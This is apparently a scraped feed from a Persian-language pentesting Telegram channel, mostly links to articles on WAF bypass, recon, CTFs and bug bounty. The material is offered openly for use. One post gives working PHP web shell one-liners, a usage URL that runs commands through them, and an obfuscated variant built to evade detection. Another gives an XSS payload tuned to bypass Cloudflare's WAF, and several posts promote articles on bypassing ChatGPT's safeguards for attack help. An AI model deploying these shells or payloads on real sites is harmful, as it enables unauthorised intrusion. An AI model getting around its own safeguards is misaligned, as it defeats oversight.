🗒 3 tricks to bypass Cloudflare WAF in file upload


https://medium.com/numen-cyber-labs/3-tricks-to-bypass-cloudflare-waf-in-file-upload-9abb83530cfc



@PenTest_Tm

🗒 Handbook for CTF


@PenTest_Tm

🗒 Burp Suite Plugin Development

برای کسایی که علاقه دارن پلاگین برای برپ توسعه بدن یا برای خودشون پلاگین بنویسن👌


@PenTest_Tm

🗒 Recon Tools


@PenTest_Tm

🗒 Web PenTesting Checklist

یکی از کامل ترین چک لیست هایی که تا حالا دیدم حتما ازش استفاده کنین 👌


@PenTest_Tm

🗒 ChatGPT for CyberSecurity
-| Part 1
دوستانی که میخوان چت جی پی تی رو بایپس کنن و ازش برای اهدافشون کمک بگیرن مفیده بخونید👌

@PenTest_Tm

🗒 ChatGPT for CyberSecurity
-| Part 2
قسمت دوم مقاله ی چت جی پی تی


@PenTest_Tm

🗒 ChatGPT for Cybersecurity
-|Part 3
قسمت سوم مقاله ی چت جی پی تی


@PenTest_Tm

🗒 ChatGPT for Cybersecurity
-|Part 4
قسمت چهارم مقاله ی چت جی پی تی


@PenTest_Tm

🗒 mini PHP Payload

*
<?=$_GET[0]?>
<?=$_POST[0]?>
<?={$_REQUEST['_']}?>
*
Usage :

Target.com/path/to/shell.php?0=command

*
Obfuscation :

<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>

@PenTest_Tm

🗒 TBHM - The Bug Hunter's Methodology

دوره حقیه کسایی که زبانشون خوبه ببینن


Source : Hide01
@PenTest_Tm

🗒 File Upload Cheatsheet



@PenTest_Tm

🗒 bypass XSS Cloudflare WAF

Encoded Payload
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload
"><track/onerror='confirm1'>


@PenTest_Tm

🗒 Bypass Cloudflare protected sites with sqlmap

بچها یه مقاله عالی برای بایپس WAF با sqlmap


https://medium.com/@pkhadka56/bypass-cloudflare-protected-sites-with-sqlmap-64b1644b0414



@PenTest_Tm

🗒 Cross-Site Scripting (XSS) Explained!

How to Bug Bounty

https://www.youtube.com/watch?v=ej2O4lOUzRc



@PenTest_Tm

🗒 How we applied advanced fuzzing techniques to cURL


https://blog.trailofbits.com/2024/03/01/toward-more-effective-curl-fuzzing/



@PenTest_Tm